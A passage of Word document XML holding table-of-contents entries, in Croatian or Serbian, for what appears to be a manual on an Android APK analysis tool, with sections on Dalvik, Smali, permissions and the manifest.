        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Meni</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756600 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756601" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>3.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Glavna alatna traka</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756601 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756602" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>3.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Glavni prozor</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756602 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756603" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>CFG</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756603 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756604" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Dalvik</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756604 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>8</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756605" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>ByteCode</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756605 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756606" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Smali</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756606 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756607" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.5.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Java</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756607 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756608" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.6.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Call in/out</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756608 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756609" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.7.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Permission</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756609 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756610" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.3.8.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>AndroidManifest.xml</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756610 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756611" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>3.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Sporedni prozor</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756611 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756612" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.1.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Files</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756612 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756613" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.2.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Strings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756613 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756614" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Classes</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756614 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756615" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>3.4.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>Methods</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756615 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
